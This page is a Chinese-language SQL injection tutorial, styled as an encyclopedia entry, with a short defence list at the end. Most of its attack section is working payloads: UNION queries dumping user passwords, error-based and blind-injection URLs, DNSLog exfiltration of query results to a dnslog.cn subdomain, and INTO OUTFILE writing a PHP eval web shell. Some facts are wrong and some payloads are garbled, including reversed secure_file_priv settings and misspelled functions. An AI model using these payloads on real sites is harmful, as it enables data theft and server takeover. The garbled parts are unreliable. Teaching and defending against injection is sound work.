sql注入百度百科

sql注入百度百科目录 漏洞原因 过程 数字型 字符型 联合查询注入 报错注入 回显注入 基于布尔的盲注 基于时间的盲注 HTTP 头注入 DNSLog 注入 危害 防范 总结 漏洞原因 一些概念 SQL 用于数据库中的标准数据查询语言 web 分为前端和后端 前端负责进行展示 后端负责处理来自前端的请求并提供前端展示的资源 而数据库就是存储资源的地方 而服务器获取数据的方法就是使用 SQL 语句进行查询获取

目录
  • 漏洞原因
  • 过程
    • 数字型:
    • 字符型
    • 联合查询注入
    • 报错注入
    • 回显注入
    • 基于布尔的盲注
    • 基于时间的盲注
    • HTTP头注入
    • DNSLog注入
  • 危害
    • 防范
      • 总结

        漏洞原因

        一些概念:

        SQL:用于数据库中的标准数据查询语言。

        web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。

        而数据库就是存储资源的地方。

        而服务器获取数据的方法就是使用SQL语句进行查询获取。

        SQL注入:所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法

        SQL可分为平台层注入和代码层注入。

        平台层注入:由于不安全的数据库配置或数据库平台的漏洞导致。

        代码层注入:程序员对输入没有细致地过滤,从而执行了非法地数据查询。

        原因:在前后端数据的交互中,前端的数据传到后台处理时,没有做严格的判断,导致其传入的数据拼接到SQL语句中,被当成SQL语句的一部分执行,从而导致数据库受损,信息丢失。

        总结版:后台服务器接收相关参数未经过过滤直接带入数据库查询。

        例子:

        比如这是一条前端URL:https://www.本网站.net/aboutus.php?id=1

        其后台sql语句:$sql=“SELECT 123 FROM abc WHERE id='1 '"

        这条语句是采用拼接方式去对数据库内容进行查询的,而且并未对用户在前端输入的内容做过滤,并且用户对id这个参数可控,本来程序员设计这条查询语句是希望通过它去快速查询数据库中abc表的某个内容并且回显到前端页面来的,但是攻击者通过单引号’ 闭合数据库查询语句,并且可以构造这样的恶意url:https://www.本网站.net/aboutus.php?id=-1 ’ select password from admin#去查询admin 用户的密码,而非查询预先程序员所设计好的数据内容。

        其中:url中?代表传值的意思,id代表变量,等号代表变量的值。

        浏览器通常使用 ? 来表示GET方法传递参数,而使用POST传递参数是不会显示到URL中的,因此URL中含有?说明就是使用GET方法传递参数。POST型注入和Cookie注入需要插件和工具才可进行。

        过程

        常见的注入方式:

        参数类型分类:

        数字型、字符型

        注入手法分类:

        联合查询注入、报错注入、基于布尔的盲注、基于时间的盲注、HTTP头注入、宽字节注入、堆叠查询、二阶注入。

        数字型:

        当输入的参数为整形时,若存在注入漏洞,则是数字型注入。

        如:https://blog.csdn.net/aboutus.php?id=1

        此时后台语句:$sql=“SELECT 123 FROM abc WHERE id='1 '"

        检测方法:URL输入 and 1=1 / and 1=2 报错则说明有注入

        字符型

        当输入参数为字符串时,称为字符型注入。

        它与数字型的区别:数字型不需要单引号来闭合,而字符串需要单引号来闭合。

        例:https://blog.csdn.net/aboutus.php?id=1’

        此时后台语句:$sql=“SELECT 123 FROM abc WHERE id='1 ’ ’ "

        此时多出了一个单引号,破坏了原本的SQL语句结构,数据库无法处理,于是会报错,证明这条语句成功被带进数据库查询,存在字符型注入。

        此时通过 --+把后面的单引号注释掉,SQL语句也会形成闭合。

        所以我们可以这样:

        ?id = 1’ 攻击语句 --+

        传入页面就变成了

        select user from database where id = ‘1’ 攻击语句 – ’

        –+:起注释作用,将后面的语句注释掉,在url中+相当于空格,–是注释符号,单行注释,之所以要加+号是因为–与单引号连在一起无法起注释作用因此必须把它们隔开

        联合查询注入

        联合查询适合于有显示位的注入,即页面某个位置会根据我们输入的数据的变化而变化。

        • 页面观察

        输入id=1和id=2,若页面中值有变化,说明输入与数据库有交互

        • 注入点判断

        直接输入?id=1’若有报错则存在注入,开始判断可以从哪里注入,?id=2’1=2–+页面显示不正常,说明此处存在SQL注入,注入点在引号。

        接下来开始使用SQL语句进行攻击。

        • 使用order by判断当前表的字段个数

        例:?id=1 order by n --+

        若n超过当前表的列数,就会报错,说明表中只有n-1列

        • 判断显示位

        判断显示位时,要使用 ?id=-1 或者改为0 让前面的select语句查询为空错误,然后采用后面的select语句去查询:

        ?id=-1' union select 1,2,3 --+

        观察页面在哪里回显我们的输入,就可以用那个地方测试接下的语句。

        • 爆数据库的名字

        ?id=1' union select 1,database(),3 --+

        在之前回显2的地方会回显database数据库的名字。

        • 爆数据库中的表

        ?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

        数据库语句懒得解释了。

        • 爆表中的字段

        ?id=1' union select 1,group_concat(column_name),3 from information_schema.column where table_schema='爆出来的数据库名‘ and table_name=‘爆出来的表名' --+

        • 爆相应字段的所有数据

        ?id=-1' union select 1,group_concat(id,'–‘,username,'–',password),3 from users --+

        报错注入

        含义:就是在mysql中使用指定函数来制造报错,查询的时候加一些格式错误的信息,它会提示你格式错误,可以在中间加入一些其他信息,比如select database(),报错信息后面也会出现数据库信息.

        报错注入:利用数据库的报错信息得到数据库的内容。因此需要构造语句让数据库报错。

        三种报错注入的方法:

        • group by 重复健冲

        and (select 1 from (select count(*),concat((select 查询的内容 from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.table group by x)a) --+ 

        • extractvalue()函数

        ?id=1' and extractvalue(1,concat('^',(select database()),'^')) --+//获取数据库名字

        extractvalue(xml_frag,xpath_expr);

        函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。

        如果没有匹配的内容,不管出于何种原因,只要路径有效并且查询的内容由正确嵌套和关闭的元素组成,返回空字符串。

        但如果路径写入错误格式,就会报错并且返回我们写入的非法内容。

        • updatexml()函数

        ?id=1' and updatexml(1,conncat('^',(需要查询的内容),'^'),1) --+ 

        updatexml(xml_target,xpath_expr,new_xml);

        此函数将XML标记的给定片段的单个部分替换为xml_target新的XML片段new_xml,然后返回更改的XML。

        xml_target替换的部分 与xpath_expr 用户提供的XPath表达式匹配。如果未xpath_expr找到表达式匹配 ,或者找到多个匹配项,则该函数返回原始 xml_targetXML片段。

        所有三个参数都应该是字符串。与extractvalue()类似,如果XPATH写入错误格式,就会报错,并且返回我们写入的非法内容。

        • floor()函数

        floor(x),返回小于或等于x的最大整数。

        回显注入

        回显注入:利用注入漏洞可以改变页面返回数据。

        基于布尔的盲注

        布尔盲注:即在页面不显示数据,只显示对错,此时我们输入的语句让页面呈现两种状态,相当于true和false,根据这两种状态判断我们输入的语句是否查询成功。

        因此需要构造判断语句,根据页面是否回显证实猜想。

        一般用到的函数:

        ascii()、 substr()、length()、exists()、concat()等。

        substr(strings|express,m,[n])函数:

        strings|express :被截取的字符串或字符串表达式

        m 从第m个字符开始截取

        n 截取后字符串长度为n

        concat()函数:concat ()方法用于连接两个或多个数组。用于输出在页面中。

        步骤:

        • 判断数据库类型

        数据库可能的类型:

        MySQL、 access、 SQL sever 、information_schema.tables、msysobjects、sysobjects

        • 判断数据库名(数据库名长度、每个ASCII值)
        • 判断库中的表名(表的个数、每个表名的长度和表名的ASCII)

        //猜测当前数据库中是否存在admin表 http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from admin) --+ 1:判断当前数据库中表的个数 // 判断当前数据库中的表的个数是否大于5,用二分法依次判断,最后得知当前数据库表的个数为4 http://127.0.0.1/sqli/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())>3 --+ 2:判断每个表的长度 //判断第一个表的长度,用二分法依次判断,最后可知当前数据库中第一个表的长度为6 http://127.0.0.1/sqli/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+ //判断第二个表的长度,用二分法依次判断,最后可知当前数据库中第二个表的长度为6 http://127.0.0.1/sqli/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6 --+ 3:判断每个表的每个字符的ascii值 //判断第一个表的第一个字符的ascii值 http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+ //判断第一个表的第二个字符的ascii值 http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>100 --+ ......... 由此可判断出存在表 emails、referers、uagents、users ,猜测users表中最有可能存在账户和密码,所以以下判断字段和数据在 users 表中判断 

        判断表中的字段名(字段个数、每个字段名长度、字段名的ASCII值)爆字段中的数据(字段中的数据长度、数据的ASCII)

        1: 判断数据的长度 // 判断id字段的第一个数据的长度 http://127.0.0.1/sqli/Less-5/?id=1' and length((select id from users limit 0,1))>5 --+ // 判断id字段的第二个数据的长度 http://127.0.0.1/sqli/Less-5/?id=1' and length((select id from users limit 1,1))>5 --+ 2:判断数据的ascii值 // 判断id字段的第一行数据的第一个字符的ascii值 http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select id from users limit 0,1),1,1))>100 --+ // 判断id字段的第二行数据的第二个字符的ascii值 http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select id from users limit 0,1),2,1))>100 --+ ........... 

        基于时间的盲注

        时间注入:通过返回时间的长短判断。

        如:获取第一个字符的ascii码,判断是否大于115,不成立延时五秒返回。

        补充:

        sleep(5)的意思是延迟五秒。

        if(expr1,expr2,expr3) 若expr1的值为true,则返回expr2的值,如果expr1的值为false,则返回expr3的值。

        例:

        ?id=1' and if(ascii(substr(database(),2,1))= 101,sleep(5),0) --+

        此处就是判断数据库名字的第二个字母。

        用法类似布尔盲注。

        HTTP头注入

        常见的SQL注入一般是通过请求参数或是表单进行注入,而HTTP头注入是通过HTTP协议头部字段值进行注入。

        img

        条件:

        • 能够对请求头信息进行修改
        • 修改的请求头信息能带入数据库进行查询
        • 数据库没有对输入的请求信息做过滤

        • user-Agent注入
        • cookie注入
        • Referer注入
        • X-Forwarded-For注入
        • 宽字节注入

        DNSLog注入

        前置知识:

        1.什么是dnslog?

        dns服务主要是域名解析服务器将域名转换成ip时,会生成一个日志,主要记录:什么时候请求解析,什么域名,映射出什么ip;

        但一般来说是看不到解析日志的,但有开放的平台:dnslog.cn

        2.UNC:

        UNC全名:universal naming convention,通用命名规则。其实是网络上的资源的格式,在Windows里使用。

        3.mysql读写函数:

        (mysql可以读写文件的。)

        4.配置:

        secure_file_priv的配置值分三种——

        指定文件夹:读写导入导出只能发生在指定文件夹

        不设置:不允许执行

        null:无限制

        5.读取文件过程:

        读文件:LOAD_FILE()

        限制:只能本机的文件且文件有读取权限,且字节数小于max_allowed_packet

        判断文件有无读取权限: and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限 如果返回错误,应该是管理员给数据库账户降权。 如果文件不存在或者不能被读出,函数返回空。在 windows 下,如果 NTFS 设置得当,是不能读取相关的文件的,当遇到只有administrators 才能访问的文件,users 就别想 load_file 出来。 

        用法:select LOAD_FILE(‘E:\in.txt’);

        两个难点:

        绝对的物理路径构造有效的畸形语句(报错出绝对路径)

        在很多 PHP 程序中,当提交一个错误的 Query,如果 display_errors = on,程序就会暴露

        WEB 目录的绝对路径,只要知道路径,那么对于一个可以注入的 PHP 程序来说,整个服务

        器的安全将受到严重的威胁。

        常用路径:http://www.cnblogs.com/lcamry/p/5729087.html

        读取示例:

        image-20221016172321397

        将文件导入进数据库:

        LOAD DATA INFILE语句用于高速从一个文本文件中读取行并装入一个表中。文件名称必须为一个文字字符串。

        示例:

        load data infile '/temp/t0.txt' ignore into table t0 character set gbk fields terminated by '\t' lines terminated by '\n' 

        含义:将/tmp/t0.txt 导入到 t0 表中,character set gbk 是字符集设置为 gbk,fields terminated by 是

        每一项数据之间的分隔符,lines terminated by 是行的结尾符。

        注:当错误代码是 2 的时候的时候,文件不存在,错误代码为 13 的时候是没有权限,可以考虑

        /tmp 等文件夹。

        导入到文件

        格式:SELECT … INTO OUTFILE ‘file_name’

        可以把被选择的行写入一个文件中。该文件被创建到服务器主机上,因此您必须拥有 FILE

        权限,才能使用此语法。file_name 不能是一个已经存在的文件。

        两种利用形式:

        直接将select内容导入到文件中

        select ... into outfile "c:\\phpnow\\htdocs\\test.php" /*此处的...可以是一个函数如version()也可以是一句话如:<?php @eval($_post["111"]) ?>,或者其他内容 

        修改文件结尾

        select version() into outfile "c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x16

        例如:

        在 sqlmap 中 os-shell 采取的就是这样的方式,具体可参考 os-shell 分析文章:https://www.本网站.net/article/276901.htm

        DNSlog注入:

        注入流程:

        1.把select LOAD_FILE()注入到数据库访问日志文件

        2.UNC构建DNS服务器地址(其实就是服务器子域名),假装访问文件,产生DNSLog

        select load_file('aaa.yourid.dnslog.cn/byh');四个斜杠其实本来只有两个,还有两个是防止转义,/byh不能缺少,不然不是一个标准的路径 

        3.把子域名替换成函数或者查询SQL

        select if((select load_file(concat('',database(),'yourid.dnslog.cn/byh'))),1,0);#其实就是把aaa换成了database() 

        最后我们使用的平台就会显示解析日志,在日志里就能看到查询的内容。

        危害

        • 数据库信息泄露:用户隐私信息泄露
        • 网页篡改:通过操纵数据库对网页进行篡改
        • 网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击
        • 数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员账户被篡改
        • 服务器被远程控制,被安装后门:经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统
        • 破环硬盘数据,瘫痪全系统

        防范

        SQL漏洞修复和防范方法:

        1、普通用户与系统管理员用户的权限要有严格的区分

        2、 预编译,如使用参数化语句和绑定变量。

        3、 加强对用户输入的验证,识别恶意内容,过滤掉某些危险语句。

        4、 多使用SQL Server数据库自带的安全参数。

        5、 转义,把用户的输入当成文本以及用斜杠来转义

        6、数据库异常信息隐藏

        6、 必要的情况下使用专业的漏洞扫描工具来寻找可能被攻击的点。

        7、设置陷阱账号:

        设置两个帐号,一个是普通管理员帐号,一个是防注入的帐号。将防注入的账号设置的很象管理员,如 admin,以制造假象吸引软件的检测,而密码是大于千字以上的中文字符,迫使软件分析账号的时候进入全负荷状态甚至资源耗尽而死机。

        8、防火墙,限制同IP时间、禁IP访问、黑名单

        9、对密码之类的信息进行加密

        10.禁用某些参数,如secure file priv

        总结

        到此这篇关于SQL注入详细讲解的文章就介绍到这了,更多相关SQL注入详解内容请搜索本网站以前的文章或继续浏览下面的相关文章希望大家以后多多支持本网站!

        您可能感兴趣的文章:

        • 利用SQL注入漏洞登录后台的实现方法
        • 有效防止SQL注入的5种方法总结
        • 利用SQL注入漏洞拖库的方法
        • SQL注入中绕过 单引号 限制继续注入
        • SQL注入绕过的技巧总结
        知秋君
        上一篇 2024-11-07 13:02
        下一篇 2024-11-13 18:48

        相关推荐